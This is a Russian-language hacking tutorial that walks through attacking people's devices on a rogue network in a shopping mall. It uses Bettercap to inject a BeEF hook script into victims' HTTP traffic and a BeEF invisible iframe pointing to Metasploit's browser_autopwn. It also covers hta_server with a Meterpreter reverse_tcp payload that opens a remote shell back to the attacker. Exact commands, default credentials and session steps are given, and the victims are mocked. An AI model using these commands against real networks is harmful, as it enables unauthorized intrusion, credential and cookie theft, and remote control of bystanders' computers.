Рыбачим в торговом центре

Рыбачим в торговом центре

Wh1teRabb1t

Всем привет. Недавно была статья про Ubertooth, некоторые написали что такой объем статьи - смех. И пожалуй те кто это сказал - оказались правы. Поэтому буду стараться делать статьи побольше и без воды. *Нас уже 100 :)*

Сразу оговорюсь что статья будет с лишними действиями и всё нижеописанное можно было сделать быстрее, но мы ведь вникаем в работу программ.

Итак, в чём заключается статья? Ну просто использовать программы - хорошо, а комбинировать их еще лучше. И сегодня мы будем получать доступ к устройствам в людных местах. Делать это мы будем при помощи Metasploit + BeEF + Bettercap.

С помощью инструмента Bettercap мы будем инжектить вредоносную ссылку, то есть на какой бы сайт не перешел человек подключенный к нашей сети, он будет попадать на тот который выбрали мы.

Beef упрощает работу с пользователями. Либо если вы не хотите получить полный доступ а например просто так куки похитить по кейлогерить и тому подобное. Но и доступ получать тоже можно.

А с помощью Metasploit мы конечно будем использовать exploit, и слушать как к нам "стучится" либо человек в погонах, либо сессия. Надеюсь второе :)

Для начала поставим Bettercap (замечательный MiTM инструмент) командой apt-get install bettercap. И сразу пишем команду вставки джаваскрипт кода - bettercap --proxy --proxy-module injectjs --js-url "http://You_Local_IP:3000/hook.js"

Еще для подцепления браузера, можно просто скинуть жертве ссылку - http://You_Local_IP:3000/demos/basic.html, но нам это не подходит, так как мы хотим сделать всё незаметно для жертвы.

Примечание: Терпилка должна заходить на http-сайты, возможно в https не будет работать inject js. И нужно будет использовать SSLTrip ;)

Что же такое BeEF? BeEF (Browser Exploitation Framework) инструмент для сотворения чудес в браузере терпилки(жертвы). То есть с помощь него можно что угодно. Подменять ссылки, узнавать логины\пароли и заражать с помощь СИ, просматривать камеру, прослушивать звук и т.д и т.п.

Так вот, в кали-подобных системах этот инструмент предустановлен. Запускаем мы его командой beef-xss. Нам выдало 5 строк, находим UI URL, копируем ссылку и идем по ней в любой браузер. Видим окно аутентификации, пишем в логин - beef, в пароль также - beef.

Итак, как только терпила перешла на любой http сайт мы хукаем её браузер, и можем делать очень многое (об этом будет статья). Вот после того как доступ у нас, мы можем атаковать. Есть отдельный блок - Commands, там множество команд, отсортированных по нуждам. Есть 3 типа индикаторов по так сказать "удачной атаке". Зеленый индикатор - атака удастся, желтый - возможно удастся и красный - скорее всего не удастся, но можно попробовать.

Интерфейс не сложный, разобраться не составит труда.

Теперь непосредственно нам нужно запустить Metasploit(msfconsole). Нам нужно выбрать эксплойт use auxiliary/server/browser_autopwn, и нужно заполнить LHOST, у меня это set LHOST 192.168.60.144. Сразу запускаем модуль - run -z.

Скажу честно, сначала использовал эксплойт browser_autopwn2, но он у меня не отработал как нужно. А вот тот же эксплойт но без 2 в конце, как раз то, что нужно! Он проверил и подгрузил все нужные модули.

В самом низу видим ссылку, копируем её, она нам нужна.

Теперь мы будем делать так, чтоб пользователь не подозревая перешел по нашей уязвимой ссылке. Это мы сделаем с помощью BeEF. Для этого нам нужно в разделах выбрать - Misc, a в модулях выбрать - Create Invisible Iframe. И слева в окошко URL вставляем нашу ссылку. Ну и кликаем Excute.

Теперь немного ждём и в итоге видим - у нас открылась сессия. Вообще на этом всё, но я хотел бы рассказать Вам еще кое о чём.

HTA SERVER

Если юзер не очень внимательный и пофигист, не думающий о вирусах и безопасности, то можно использовать exploit основанный на соц. инженерии - hta_server. В metasploit пишем use exploit/windows/misc/hta_server. Выбираем полезную нагрузку set payload windows/meterpreter/reverse_tcp. Настраиваем ip\port, командами set LPORT 4444, set LHOST 192.168.60.144 и set SRVHOST 192.168.60.144. И запускаем процесс командой exploit -j. Как и в случае с Autopwn, внизу будет ссылка, но теперь перейдя по ней пользователю предложат скачать файл. После скачивания и запуска последнего, мы видим открытую сессию терпилки. А теперь обилие картинок

Запуск hta_server
Терпилка
Прилетела сессия

Теперь нас есть полный доступ. Открываем сессию командой sessions -i 1, получаем доступ. Для затравки можете написать shell, тем самым Вы получите доступ к командной строке терпилки. Можем написать notepad.exe, и у жертвы откроется блокнот.

Запускаем блокнот
И он открылся

Если креативно подойти к эксплойту hta_server, то можно неплохо по рыбачить)

Всем огромное спасибо. С Вами был Wh1teRabb1t. Следующие статьи будут по эксплуатации BeEF и Metasploit. И еще позаботьтесь о своей безопасности! Удачи.







Report Page